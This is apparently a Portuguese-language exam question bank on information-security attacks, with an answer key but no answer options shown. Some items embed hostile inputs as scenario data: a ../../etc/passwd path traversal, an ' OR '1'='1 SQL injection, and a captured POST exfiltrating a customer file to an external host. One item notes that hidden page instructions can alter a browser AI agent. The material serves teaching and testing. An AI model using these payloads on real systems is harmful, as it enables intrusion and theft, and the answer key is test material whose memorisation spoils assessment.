Questões de Concurso Sobre ataques e ameaças em segurança da informação

Foram encontradas 1.892 questões

Q4229297 Segurança da Informação
Relacione corretamente os tipos de malwares às suas respectivas características:
I. Rootkit
II. Worm
III. Trojan
IV. Ransomware
( ) Malware que se propaga automaticamente pela rede ou entre dispositivos, sem depender necessariamente da ação direta do usuário após a infecção inicial.
( ) Malware desenvolvido para ocultar sua presença no sistema comprometido, dificultando sua detecção por usuários e ferramentas de segurança.
( ) Malware que aparenta ser um software legítimo ou confiável para induzir o usuário à instalação ou execução.
( ) Malware que bloqueia ou criptografa arquivos e exige pagamento para liberação do acesso às informações.
Assinale a alternativa que apresenta a sequência correta:
Alternativas
Q4226678 Segurança da Informação
Relacione corretamente os tipos de ataques de engenharia social às respectivas características:

I. Phishing
II. Tailgating
III. Baiting
IV. Vishing

( ) Utiliza ligações telefônicas para convencer vítimas a fornecer informações confidenciais.
( ) Explora a curiosidade da vítima por meio de dispositivos ou arquivos aparentemente atrativos contaminados com malware.
( ) Ocorre quando uma pessoa não autorizada acompanha alguém autorizado para acessar área restrita.
( ) Utiliza mensagens fraudulentas, como e-mails ou SMS, para induzir vítimas a fornecer dados sensíveis.

Assinale a alternativa que apresenta a sequência correta:
Alternativas
Q4226677 Segurança da Informação
Com base nos conceitos relacionados à engenharia social, assinale a alternativa correta: 
Alternativas
Q4219820 Segurança da Informação
Durante uma auditoria de segurança, uma equipe identificou que alguns usuários de uma organização estavam sendo direcionados para uma página falsa visualmente idêntica ao portal legítimo da instituição. Nessa página fraudulenta, os usuários informavam as suas credenciais, que eram posteriormente utilizadas por terceiros para acessar sistemas corporativos.
A partir dessa situação hipotética, é correto afirmar que o ataque descrito está associado especificamente ao termo
Alternativas
Q4218771 Segurança da Informação
O analista de TI do IFCE recebeu um alerta do sistema de monitoramento indicando tráfego anômalo originado de um servidor web institucional. Ao investigar, identificou que: o servidor estava estabelecendo conexões de saída para endereços IP externos desconhecidos na porta 4444; grandes volumes de dados estavam sendo exfiltrados; o processo httpd havia sido substituído por um binário malicioso; e os logs do servidor indicavam que a intrusão ocorreu por meio de uma vulnerabilidade em um plugin desatualizado do CMS instalado. Diante desse incidente de segurança em andamento, qual deve ser o procedimento imediato mais adequado, seguindo as boas práticas de resposta a incidentes? 
Alternativas
Q4218249 Segurança da Informação
Uma instituição pública passou a expor parte de seus serviços por meio de APIs utilizadas na comunicação entre sistemas internos e aplicações externas.
Em uma revisão de segurança, a equipe técnica avaliou diferentes medidas de proteção dos recursos expostos, considerando aspectos ligados a controle de acesso, proteção das comunicações, tratamento das requisições recebidas e limitação do uso dos serviços.
Sobre esse contexto, assinale a opção que apresenta uma medida tecnicamente adequada. 
Alternativas
Q4218213 Segurança da Informação
Um professor da rede municipal recebeu um e-mail informando que sua conta institucional seria bloqueada e que, para evitar o bloqueio, deveria clicar em um link e informar seus dados de acesso. O e-mail apresentava erros de escrita e um endereço eletrônico semelhante, mas não idêntico, ao domínio oficial da instituição. Considerando conceitos básicos de segurança na internet, assinale a alternativa que apresenta a conduta adequada diante dessa situação.
Alternativas
Q4218146 Segurança da Informação
Durante a investigação de um incidente, um analista identificou tráfego suspeito saindo de um servidor interno para um endereço externo na porta 8081, não usual para o ambiente.
O analista, usando o Wireshark, realizou a captura de pacotes diretamente do servidor interno, sem perdas, aplicou o filtro tcp.port == 8081 e, ao selecionar uma das conexões, utilizou o recurso Follow TCP Stream, obtendo o seguinte diálogo:

POST /sync HTTP/1.1
Host: update-service.external.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Length: 1024

file=clientes.csv&data=Q2xpZW50ZTosQ1BGLENhcnRhbwoxMjMs MDAwMDAw... (trecho exibido pelo Follow TCP Stream)" 

Com base nesse cenário, assinale a opção que apresenta a interpretação mais adequada. 
Alternativas
Q4218142 Segurança da Informação
O XSS (Cross-site Scripting) é um ataque do tipo injection, que traz riscos se não for tratado corretamente. O site OWASP top 10 na sua lista de 2025, elenca o ataque de injection na quinta posição, mostrando a importância da sua mitigação para um desenvolvimento seguro.

Assinale a opção que indica o procedimento correto para mitigar ataques do tipo XSS. 
Alternativas
Q4218128 Segurança da Informação
O OWASP Top 10:2025 apresenta as principais categorias de riscos de segurança em aplicações web, incluindo falhas relacionadas à manipulação inadequada de entradas fornecidas pelo usuário.
Uma aplicação web, hospedada no endereço http://www.eth0123.com, permite acesso a informações jornalísticas por meio do seguinte endereço:
“ http://www.eth0123.com/acesso.php?arq=jornal “
Durante uma análise de segurança, verificou-se que o parâmetro “arq” é utilizado pela aplicação para carregar conteúdos armazenados no servidor. Em razão de falha na validação de entradas fornecidas pelo usuário, foi possível manipular o endereço de acesso conforme apresentado abaixo, permitindo visualizar o conteúdo de um arquivo sensível do sistema:
http://www.eth0123.com/acesso.php?arq=../../etc/passwd

Assinale a opção que apresenta, corretamente, a técnica de exploração usada nesse cenário. 
Alternativas
Q4216643 Segurança da Informação
Um servidor recebe um e-mail supostamente enviado pelo setor de tecnologia do órgão, com o assunto “Ação imediata: sua conta será bloqueada hoje”. A mensagem solicita que ele clique em um link encurtado para “confirmar a senha” e informa que há um anexo para instalação de uma atualização urgente. Assinale alternativa que indica qual conjunto de elementos indica maior probabilidade de phishing. 
Alternativas
Q4215968 Segurança da Informação

Durante uma auditoria de segurança, foi identificado que um campo de login de uma aplicação web aceita a entrada ‘ OR  ‘1’ = ’1 e retorna acesso não autorizado ao sistema, indicando que a consulta enviada ao banco de dados foi alterada devido à ausência de sanitização de parâmetros fornecidos pelo usuário, configurando um ataque do tipo:

Alternativas
Q4215967 Segurança da Informação

Um tipo de software malicioso foi identificado em um sistema corporativo após a constatação de que dados sensíveis, como credenciais de acesso e histórico de navegação, estavam sendo coletados secretamente e transmitidos a um servidor remoto controlado por um terceiro não autorizado, sem alterar arquivos do sistema nem criptografar dados do usuário, caracterizando-se como:

Alternativas
Q4215468 Segurança da Informação
Durante sua jornada na internet, Lucas recebe um e-mail aparentemente confiável de um banco, solicitando que ele clique em um link e informe seus dados pessoais. Desconfiado, ele percebe que o endereço do remetente é estranho e pode ser uma tentativa de golpe.

Que tipo de ameaça está representada nessa situação?
Alternativas
Q4213455 Segurança da Informação
Considere que a Prefeitura Municipal Vitória sofreu um ataque de ransomware que resultou na indisponibilidade de sistemas críticos e na criptografia de arquivos em diversos computadores e servidores. Relatórios preliminares da equipe de segurança da informação indicam que, antes da criptografia, houve acesso não autorizado ao ambiente, com indícios de movimentação lateral e possível exfiltração de dados sensíveis. Após o incidente, uma mensagem foi exibida nos sistemas comprometidos, exigindo pagamento para a recuperação dos dados. Considerando que a situação já ocorreu e, ainda, que é necessário restabelecer o ambiente, são consideradas técnicas eficazes de serem adotadas pelo corpo técnico, EXCETO: 
Alternativas
Q4209773 Segurança da Informação
Sobre os recursos ou práticas a seguir listados, analise as assertivas abaixo:
I. O filtro antiphishing nativo do navegador reduz o risco de fraude ao bloquear ou alertar sobre sites maliciosos.
II. Uma extensão de navegador instalada após validação de procedência e permissões diminui a superfície de ataque ao limitar a confiança a software verificado.
III. Um agente de IA do navegador autorizado a processar páginas contendo instruções ocultas exige proteção adicional, pois instruções ocultas podem alterar o comportamento do agente.
Quais estão corretas? 
Alternativas
Q4208014 Segurança da Informação
Considerando Ferramentas de Firewall, pode se afirmar que:

I - Podem isolar a rede interna da organização da Internet convencional, permitindo a passagem de alguns pacotes e bloqueando outros.
II - Podem previnnir ataques de negação de serviço (DoS), impedem a modificação ou o acesso ilegal a dados internos e permitem apenas o acesso autorizado à rede interna.
III - Em relação ao uso de estados, filtros de pacotes sempre se utilizam do estado das conexões.

Das afirmativas acima, qual(is) está(ão) correta(s)? 
Alternativas
Q4207741 Segurança da Informação
Phishing, phishing-scam ou phishing/scam é o tipo de fraude por meio da qual um golpista tenta obter dados pessoais e financeiros de um usuário pela utilização combinada de meios técnicos e engenharia social. Com relação ao phishing, marcar C para as afirmativas Certas, E para as Erradas e, após, assinalar a alternativa que apresenta a sequência CORRETA:

(_) O phishing geralmente ocorre por meio do envio de mensagens eletrônicas.
(_) O fraudador tenta se passar pela comunicação oficial de uma instituição conhecida, como um banco, uma empresa ou um site popular.
(_) Uma das formas de prevenção contra esse tipo de fraude é utilizar mecanismos de segurança, como programas antimalware, firewall pessoal e filtros antiphishing.
Alternativas
Q4205915 Segurança da Informação
Atenção! Para responder à questão de Informática, a menos que seja informado o contrário, considerar que os programas mencionados se encontram na versão Português-BR e em sua configuração padrão de instalação, possuem licença de uso, o mouse está configurado para destros, um clique ou duplo clique correspondem ao botão esquerdo do mouse, e teclar corresponde à operação de pressionar uma tecla e, rapidamente, liberá-la, acionando-a apenas uma vez.
Os JavaScripts, entre outros scripts Web disponíveis, são utilizados para incorporar maior funcionalidade e melhorar a aparência nas páginas Web. Apesar de nem sempre apresentarem riscos, eles vêm sendo utilizados por atacantes para causar violações de segurança em computadores. Um tipo de ataque envolvendo JavaScript consiste em:
Alternativas
Q4203969 Segurança da Informação
Em relação a ataques cibernéticos na Internet, assinale a alternativa que corresponde a um tipo de ataque caracterizado por utilizar um conjunto de dispositivos infectados para tirar de operação um serviço, servidor ou site.
Alternativas
Respostas
41: A
42: E
43: B
44: C
45: E
46: C
47: E
48: D
49: E
50: B
51: D
52: A
53: C
54: A
55: D
56: E
57: C
58: A
59: A
60: C